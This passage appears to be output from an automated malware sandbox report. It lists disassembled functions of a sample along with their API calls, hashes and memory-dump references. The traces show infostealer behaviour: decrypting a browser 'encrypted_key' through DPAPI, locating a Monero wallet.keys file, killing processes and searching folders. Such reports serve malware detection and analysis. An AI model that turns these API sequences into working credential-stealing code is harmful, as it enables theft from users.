                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: 724a6b715578aa8f2ff16e872ef87562ec33b4bf94383f0f2480fcf70a7f1afa
                        • Instruction ID: 1707d58ebd58417f3b4270363a08341fddbdee537eac0c3bdb0b3b8c6bb606d7
                        • Opcode Fuzzy Hash: 724a6b715578aa8f2ff16e872ef87562ec33b4bf94383f0f2480fcf70a7f1afa
                        • Instruction Fuzzy Hash: 56511375D201089ADB08FBB4DC96DEE737CAF94310F40C528F51A67191EE346A29CFA2
                        Function 00273560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: d0aae99a2134a5bc809aa97a49ea4df9d08501dfefcb3e2e3509236a697b9bb0
                        • Instruction ID: 886c0362b45a1cca7cdaa34bba133a87fd24e54a752d84ecd45a91f7984b0942
                        • Opcode Fuzzy Hash: d0aae99a2134a5bc809aa97a49ea4df9d08501dfefcb3e2e3509236a697b9bb0
                        • Instruction Fuzzy Hash: 90416375D20109ABCB04EFE4D885AEEB778AF54314F00C018E51A77291DB74AA29DF96
                        Function 00269CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 002699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                          • Part of subcall function 002699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                          • Part of subcall function 002699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                          • Part of subcall function 002699C0: ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                          • Part of subcall function 002699C0: LocalFree.KERNEL32(0026148F), ref: 00269A90
                          • Part of subcall function 002699C0: CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                          • Part of subcall function 00278E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00278E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00269D39
                          • Part of subcall function 00269AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269AEF
                          • Part of subcall function 00269AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00264EEE,00000000,?), ref: 00269B01
                          • Part of subcall function 00269AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269B2A
                          • Part of subcall function 00269AC0: LocalFree.KERNEL32(?,?,?,?,00264EEE,00000000,?), ref: 00269B3F
                          • Part of subcall function 00269B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00269B84
                          • Part of subcall function 00269B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00269BA3
                          • Part of subcall function 00269B60: LocalFree.KERNEL32(?), ref: 00269BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: fbcc1a7fc83cea749a552e6bf9d092339f51a603261e8bcc3aa26642f6a55146
                        • Instruction ID: 651c4ee3c7674a8852d9cccae172295f725cd3530ba4c1a5ec97a8a8529ab512
                        • Opcode Fuzzy Hash: fbcc1a7fc83cea749a552e6bf9d092339f51a603261e8bcc3aa26642f6a55146
                        • Instruction Fuzzy Hash: 4E3136B5D20109ABDF04EFD4DC85AEFB7BCBF48304F144569E905A7241EB309AA5CBA1
                        Function 002794D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 002794EB
                          • Part of subcall function 00278D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0027951E,00000000), ref: 00278D5B
                          • Part of subcall function 00278D50: RtlAllocateHeap.NTDLL(00000000), ref: 00278D62
                          • Part of subcall function 00278D50: wsprintfW.USER32 ref: 00278D78
                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 002795AB
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 002795C9
                        • CloseHandle.KERNEL32(00000000), ref: 002795D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID:
                        • API String ID: 3729781310-0
                        • Opcode ID: 92fea2a2bc0396de09950271458d122488612082b1c85fee1d820b137362de3f
                        • Instruction ID: 9a2ea96a532adf1d566725834c1f7bab9da5dd13dd8b68414c7fa3add954c63f
                        • Opcode Fuzzy Hash: 92fea2a2bc0396de09950271458d122488612082b1c85fee1d820b137362de3f
                        • Instruction Fuzzy Hash: 1B314D71E103189FDB14DFE0CC49BEDB778EB44300F508469E50AAB184DB74AA99CF52
                        Function 00278680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,002805B7), ref: 002786CA
                        • Process32First.KERNEL32(?,00000128), ref: 002786DE
                        • Process32Next.KERNEL32(?,00000128), ref: 002786F3
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • CloseHandle.KERNEL32(?), ref: 00278761
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: aa8260646ce6809d3aca52ceb0671d5c108efc53ae443b800cab94bc185ead23
                        • Instruction ID: 0219d916d30843015d054a198d3d010f8ff8f826c5022267afadca5082ab3cff
                        • Opcode Fuzzy Hash: aa8260646ce6809d3aca52ceb0671d5c108efc53ae443b800cab94bc185ead23
                        • Instruction Fuzzy Hash: 7B314D71921218ABCB24EF54CC85FEEB778EF45710F1081A9E10EA61A0DB346A55CFA2
                        Function 00277980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00280E00,00000000,?), ref: 002779B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 002779B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00280E00,00000000,?), ref: 002779C4
                        • wsprintfA.USER32 ref: 002779F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 31e984d15bbc78295bfbe927b9aeb3a3a1f548cb17acca013853972b01e6af00
                        • Instruction ID: 3f07c8f60c2c82018c9e2a19275e0e50db425eacf932475d1144c49c836de653
                        • Opcode Fuzzy Hash: 31e984d15bbc78295bfbe927b9aeb3a3a1f548cb17acca013853972b01e6af00
                        • Instruction Fuzzy Hash: 5D1127B2904118ABCB14DFC9DD45BBEBBF8FB4DB11F10421AF605A2280E3795950CBB5
                        Function 0027C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 0027C74E
                          • Part of subcall function 0027BF9F: __amsg_exit.LIBCMT ref: 0027BFAF
                        • __getptd.LIBCMT ref: 0027C765
                        • __amsg_exit.LIBCMT ref: 0027C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0027C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: fe0ae6e344d74c6bb28c83a67a512bb71c68f88192be38cd81ad1333db12b201
                        • Instruction ID: d20aedff09891486335c002585cedda31fbf8e1010b035211b89e2c1fb1bcff6
                        • Opcode Fuzzy Hash: fe0ae6e344d74c6bb28c83a67a512bb71c68f88192be38cd81ad1333db12b201
                        • Instruction Fuzzy Hash: 86F090329256019BD726BFB8584775E73A06F00B20F30C14DF40CA65D2CF7459709F56
                        Function 00274F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00278DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00278E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00274F7A
                        • lstrcat.KERNEL32(?,00281070), ref: 00274F97
                        • lstrcat.KERNEL32(?,00E28FC0), ref: 00274FAB
                        • lstrcat.KERNEL32(?,00281074), ref: 00274FBD
                          • Part of subcall function 00274910: wsprintfA.USER32 ref: 0027492C
                          • Part of subcall function 00274910: FindFirstFileA.KERNEL32(?,?), ref: 00274943
                          • Part of subcall function 00274910: StrCmpCA.SHLWAPI(?,00280FDC), ref: 00274971
                          • Part of subcall function 00274910: StrCmpCA.SHLWAPI(?,00280FE0), ref: 00274987
                          • Part of subcall function 00274910: FindNextFileA.KERNEL32(000000FF,?), ref: 00274B7D
                          • Part of subcall function 00274910: FindClose.KERNEL32(000000FF), ref: 00274B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: ae44817ddaf6adf7bd1092965bc39ed97d450598cc39c378159cda8179d30aeb
                        • Instruction ID: 2eb3d02124ba77f34f5d36f0b8b77c77bd6a68975f3633bbf95e14b93306388a
                        • Opcode Fuzzy Hash: ae44817ddaf6adf7bd1092965bc39ed97d450598cc39c378159cda8179d30aeb
                        • Instruction Fuzzy Hash: 7421DDB6910204A7C794FB70DC46EED773CAB55300F004558B65A921C1EF749AF9CF96